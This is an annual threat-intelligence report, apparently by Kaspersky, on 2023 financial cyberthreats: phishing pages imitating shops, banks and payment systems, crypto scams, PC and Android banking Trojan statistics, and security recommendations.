Money is what always attracts cybercriminals. A significant share of scam, phishing and malware attacks is about money. With trillions of dollars of digital payments made every year, it is no wonder that attackers target electronic wallets, online shopping accounts and other financial assets, inventing new techniques and reusing good old ones. Amid the current threat landscape, Kaspersky has conducted a comprehensive analysis of the financial risks, pinpointing key trends and providing recommendations to effectively mitigate risks and enhance security posture.


In this report, we present an analysis of financial cyberthreats in 2023, focusing on banking Trojans and phishing pages that target online banking, shopping accounts, cryptocurrency wallets and other financial assets. To gain an understanding of the financial threat landscape, we analyzed anonymized data on malicious activities detected on the devices of Kaspersky security product users and consensually provided to us through the Kaspersky Security Network (KSN).

Key findings Phishing
  • Financial phishing accounted for 27.32% of all phishing attacks on corporate users and 30.68% of phishing attacks on home users.
  • Online shopping brands were the most popular lure, accounting for 41.65% of financial phishing attempts.
  • PayPal phishing accounted for 54.78% of pages targeting electronic payment system users.
  • Cryptocurrency phishing saw a 16% year-on-year increase in 2023, with 5.84 million detections compared to 5.04 million in 2022.
PC malware
  • The number of users affected by financial malware for PCs dropped by 11% from 2022.
  • Ramnit and Zbot were the prevalent malware families, together targeting over 50% of affected users.
  • Consumers remained the primary target of financial cyberthreats, accounting for 61.2% of attacks.
Mobile malware
  • The number of Android users attacked by banking malware increased by 32% compared to the previous year.
  • Agent was the most active mobile malware family, making up 38% of all Android attacks.
  • Users in Turkey were the most targeted, with 2.98% encountering mobile banking malware.
Financial phishing

In 2023, online fraudsters continued to lure users to phishing and scam pages that mimicked the websites of popular brands and financial organizations. The attackers employed social engineering techniques to trick victims into sharing their financial data or making a payment on a fake page.

This year, we analyzed phishing detections separately for users of our home and business products. Among phishing and scam pages blocked on the devices of business users, 27.32% were financial phishing pages (pages mimicking online banks, payment systems and online stores). For fake pages blocked on home devices, this number was even higher at 30.68%.

TOP 10 organizations mimicked by phishing and scam pages that were blocked on business users’ devices, 2023 (download)

TOP 10 organizations mimicked by phishing and scam pages that were blocked on home users’ devices, 2023 (download)

Overall, among the three major financial phishing categories, online store users (41.65%) were targeted the most, followed by banks (38.47%) and payment systems (19.88%).

Distribution of financial phishing pages by category, 2023 (download)

Online shopping scams

Online stores were the most targeted category, comprising more than 40% (41.65%) of all financial phishing pages. Fraudsters impersonated popular online store websites, such as Amazon, eBay and Shopify, as well as brand websites and popular streaming services, such as Spotify and Netflix.

TOP 10 online shopping brands mimicked by phishing and scam pages, 2023 (download)

The most frequently impersonated e-commerce site was Amazon, which was mimicked in more than one third (34%) of all online store phishing attempts. Apple came in second with 18.66% of fraudulent pages, followed by Netflix, with 14.71%.

Sample of a phishing site that impersonates Amazon

The tenth most-copied site was the Latin American online market MercadoLibre, which was mimicked by 1.77% of phishing pages. Fake sites also frequently targeted Louis Vuitton (5.52%), Shopify (4.73%), Alibaba Group (3.17%), Spotify (3.14%), eBay (3.12%) and Luxottica (2.94%) users.

Phishing pages impersonating AliExpress, Spotify and Louis Vuitton websites

One of the most common scam types targeting online shoppers consists in cybercriminals offering heavy discounts (which, of course, expire soon), special offers, early access to goods or entertainment, and other “bargains”. Both home users and businesses were targeted. For instance, in the screenshot below, a fake page presumably is offering a bus at an attractive price. If the user attempts to buy the vehicle, they are prompted to log in with their eBay account, which is then stolen.

Fake page offering a bus at a relatively low price

Fraudsters use similar scams on social networks. For example, in the screenshot below, a fake Instagram store is offering Louis Vuitton products.

Fake Louis Vuitton store on Instagram

As new and more secure, authentication technologies appear, scammers find ways to evade these, too. The phishing page in the screenshot below, mimicking the Shopify sign-in form, implements a scenario for when the victim uses a passkey as the authentication method. Passkeys can only be used on websites and apps they are created for. To authorize passkey authentication, the user has to unlock the device the passkey was issued for. That means passkeys are of no use to phishers. To trick users into choosing to authenticate with a manually entered one-time code, the fake page displays an error message.

Fake Shopify page trying to bypass passkey authentication

Payment system phishing

Payment systems were mimicked in 19.88% of financial phishing attacks detected and blocked by Kaspersky products in 2023.

TOP 5 payment systems mimicked by phishing and scam pages (download)

Among these, PayPal (54.73%) was the one that received the most attention, with more than half of attacks using its image.

Fake page targeting PayPal users

Other most frequently victimized payment systems included MasterCard (16.58%), Visa (8.43%), Interac (4.05%) and PayPay (2.96%). Notably, of these, Visa and MasterCard are typically mimicked on fake payment pages linked to a variety of phishing and scam sites.

Cryptocurrency scams

In 2023, the number of phishing and scam attacks relating to cryptocurrencies continued to grow. Kaspersky antiphishing technologies prevented 5 838 499 attempts to follow a cryptocurrency-themed phishing link, which is 16% more than in 2022. This may be due to the fact that the Bitcoin rate, after hitting rock bottom in 2022, started to climb again in 2023. With the price of the number-one cryptocurrency setting new records at the beginning of 2024, this trend can be expected to develop further.

We have seen a number of different cryptocurrency-related schemes throughout the year. Scammers impersonated well-known cryptocurrency exchanges and offered coins in the name of major companies. Among the most notable schemes was a phishing campaign that targeted hardware crypto cold wallets. This type of wallet, normally disconnected from the internet, is considered quite safe. However, under the guise of a crypto giveaway, the attackers tricked users into connecting their hardware wallets to a fake website.

We have also seen crypto wallet phishing using well-known non-cryptocurrency brands as a lure. For example, a phishing website bearing the Apple logo and photos of Apple products invited users to get cryptocurrency called “AppleCoin”. Interestingly, a coin under that name does exist, but it has nothing to do with Apple Inc.

Phishing website touting AppleCoin in the name of Apple Inc

If the user believes that Apple has at last issued its own cryptocurrency and enters their wallet credentials, the scammers grab their funds.

PC malware

In 2023, the decline in the number of users affected by financial PC malware continued. Our data showed a decrease from 350,808 in 2022 to 312,453 in 2023, reflecting an 11% drop. This trend has persisted for the past years, and there are several reasons for that. First, users increasingly prefer mobile banking, and sign in to their online bank accounts on PCs less frequently than on smartphones. Although they may still store their banking credentials in browsers on their desktop computers, most notorious banking malware for PCs was repurposed to deliver other malware, such as ransomware, to infected systems. Often, these banking Trojans are used in more sophisticated targeted attacks, which usually means they infect fewer users.

Changes in the number of unique users attacked by banking malware in 2023 (download)

As can be seen in the graph above, banking malware attacks spiked in March. This coincided with a fourfold increase in Emotet‘s activity, which was its last large-scale campaign observed in 2023.

Key banking malware actors

The notable strains of banking Trojans in 2023 included Ramnit (35.1%), Zbot (22.5%) and Emotet (16.2%), which remained the top three financial malware families for the PC. The percentages of all three grew compared to 2022, together comprising nearly three-quarters of all financial malware attacks on desktop computers.

Name Verdict %* Ramnit/Nimnul Trojan-Banker.Win32.Ramnit 35.1 Zbot/Zeus Trojan-Banker.Win32.Zbot 22.5 Emotet Trojan-Banker.Win32.Emotet 16.2 CliptoShuffler Trojan-Banker.Win32.CliptoShuffler 6.9 Danabot Trojan-Banker.Win32.Danabot 2.2 Tinba Trojan-Banker.Win32.Tinba 2.1 SpyEyes Trojan-Spy.Win32.SpyEye 1.9 Qbot/Qakbot Trojan-Banker.Win32.Qbot 1.8 BitStealer Trojan-Banker.Win32.BitStealer 1.3 IcedID Trojan-Banker.Win32.IcedID 1.2

* Unique users who encountered this malware family as a percentage of all users attacked by financial malware

These three Trojans have a range of capabilities apart from stealing banking credentials. They can download additional modules and third-party malware, collect various types of data, such as passwords stored in browsers, and perform other malicious activities.

Fourth and fifth were CliptoShuffler (6.9%) and Danabot (2.2%), both frequently appearing in the rankings, and in sixth place was Tinba (2.2%), also known as “Tiny Banker Trojan”. Although we have not seen this family among the most active banking Trojans in previous years, it dates back to 2012, and its source code has been leaked. It is written in Assembler and gets its name for a remarkably small size.

Among other most active banking malware types were SpyEyes (1.9%), QakBot (1.8%), BitStealer (1.3%) and IcedID (1.2%).

Brazilian malware

While the overall number of desktop financial malware attacks has steadily declined, we have observed a trend for Brazilian families attempting to fill the void. In the beginning of 2023, we shared insights into new functionality added to Prilex, a type of malware known to target ATMs and PoS (point of sale) terminals. Kaspersky experts found the new modification was specifically designed to exploit contactless payments. When someone tries to pay with a contactless card, the infected PoS terminal displays an error message, prompting the buyer to insert the card and thus helping attackers to capture sensitive payment details. Cybercriminals can then run unauthorized transactions and potentially steal large sums of money from unsuspecting victims.

Another interesting malware strain is GoPIX, which targets the Brazilian instant payment system PIX. It spreads by impersonating the WhatsApp web app. Once successfully installed, it starts monitoring clipboard contents. If the malware detects PIX transaction data, it substitutes it with malicious data, tricking the user into transferring money to cybercriminals. It targets Bitcoin and Ethereum transactions in the same manner.

Recently, our Global Research and Analysis Team (GReAT) discovered Coyote, a new banking Trojan of Brazilian origin. Targeting more than 60 banking institutions, primarily in Brazil, this malware uses a sophisticated infection chain that utilizes various relatively new technologies. Spreading via the Squirrel installer, it leverages a NodeJS environment and the Nim programming language to complete infection. Coyote is capable of keylogging, taking screenshots, and setting up fake pages to steal user credentials.

Geography of PC banking malware attacks

To highlight the countries where financial malware was most prevalent in 2023, we calculated the share of users who encountered banking Trojans in the total number attacked by any type of malware in the country. The following statistics indicate where users are most likely to encounter financial malware.

The highest share of banking Trojans was registered in Afghanistan (6%), Turkmenistan (5.2%) and Tajikistan (3.7%). Switzerland (3.2%) and Mauritania (3%) were also among the worst affected by this type of threats.

TOP 20 countries by share of attacked users

Country* %** Afghanistan 6 Turkmenistan 5.2 Tajikistan 3.7 China 3.2 Switzerland 3 Mauritania 2.4 Sudan 2.3 Egypt 2.2 Syria 2.1 Yemen 2 Paraguay 2 Algeria 1.9 Venezuela 1.9 Uzbekistan 1.7 Libya 1.7 Zimbabwe 1.7 Spain 1.6 Pakistan 1.6 Iraq 1.6 Thailand 1.5

* Excluded are countries and territories with relatively few (under 10,000) Kaspersky users.
** Unique users whose computers were targeted by financial malware as a percentage of all Kaspersky users who encountered malware in the country.

Types of attacked users

Consumers (61.2%) were the main target of financial malware attacks in 2023, with their share unchanged from 2022.

Financial malware attack distribution by type (corporate vs consumer), 2021–2022 (download)

Mobile Malware

In 2023, 32% more Android users encountered mobile banking malware than in the previous year: 75,521 attacks compared to 57,219 in 2022. Moreover, we observed notable growth in the number of affected users in the last quarter of the year, which may be due to a new financial malware family called Mamont that targets mainly users in the CIS.

Number of Android users attacked by banking malware by month, 2022–2023 (download)

The most active Trojan banker was Bian.h (22.22%), followed by Agent.eq (20.95%), whose share grew by 17.50 pp compared to 2022. Third was Faketoken.pac, which affected 5.33% of all users who encountered mobile financial threats in 2023.

Verdict %*, 2022 %*, 2023 Difference in pp Change in ranking Trojan-Banker.AndroidOS.Bian.h 23.78 22.22 -1.56 0 Trojan-Banker.AndroidOS.Agent.eq 3.46 20.95 +17.50 +6 Trojan-Banker.AndroidOS.Faketoken.pac 6.42 5.33 -1.09 +1 Trojan-Banker.AndroidOS.Agent.cf 1.16 4.84 +3.68 +13 Trojan-Banker.AndroidOS.Agent.ma 0.00 3.74 +3.74 Trojan-Banker.AndroidOS.Agent.la 0.04 3.20 +3.16 Trojan-Banker.AndroidOS.Anubis.ab 0.00 3.00 +3.00 Trojan-Banker.AndroidOS.Agent.lv 0.00 1.81 +1.81 Trojan-Banker.AndroidOS.Agent.ep 4.17 1.74 -2.44 -4 Trojan-Banker.AndroidOS.Mamont.c 0.00 1.67 +1.67

* Unique users who encountered this malware as a percentage of all Kaspersky mobile security users who encountered banking threats.

Geography of the attacked mobile users

To find out which countries were worst affected by mobile financial malware in 2023, we calculated the percentage of users who encountered mobile banking Trojans among all active Kaspersky users in the country. Users in Turkey were attacked the most at 2.98%, with Saudi Arabia coming in second at 1.43% and Spain (1.38%) in third place.

TOP 10 countries by number of users who encountered mobile banking malware, 2023:

Country* %** Turkey 2.98% Saudi Arabia 1.43% Spain 1.38% Switzerland 1.28% India 0.60% Japan 0.52% Italy 0.42% South Korea 0.39% Azerbaijan 0.24% Colombia 0.24%

* Countries and territories with relatively few (under 25,000) Kaspersky mobile security users have been excluded from the rankings.
** Unique users attacked by mobile banking Trojans as a percentage of all Kaspersky mobile security users in the country.


Although the number of users affected by PC banking malware continues to decline, there are other financial threats that underscore the need to stay vigilant and protect your digital assets. Unlike 2022, the year 2023 saw the number of users encountering mobile banking Trojans increase significantly. Cryptocurrency-related phishing and scams continued to grow, too, and they are not expected to stop in the nearest future.

To protect your devices and finance-related accounts:

  • Use secure authentication methods, such as multifactor authentication, strong unique passwords, and so on.
  • Do not follow links from suspicious messages, and do not enter your credentials or payment details, unless you are 200% sure that the website is legitimate.
  • Download apps only form trusted sources, such as official app marketplaces.
  • Use reliable security solutions capable of preventing both malware and phishing attacks.

To protect your business:

  • Regularly update your software and install security patches in a timely manner.
  • Improve your employees’ security awareness, conduct regular security training and encourage safe practices, such as proper account protection.
  • Implement robust monitoring and endpoint security to detect and mitigate threats at an early stage.
  • Implement network segmentation and default deny policies for users with access to financial assets.
  • Stay aware of the latest cybercrime trends by obtaining threat intelligence from trusted sources and sharing it with industry partners.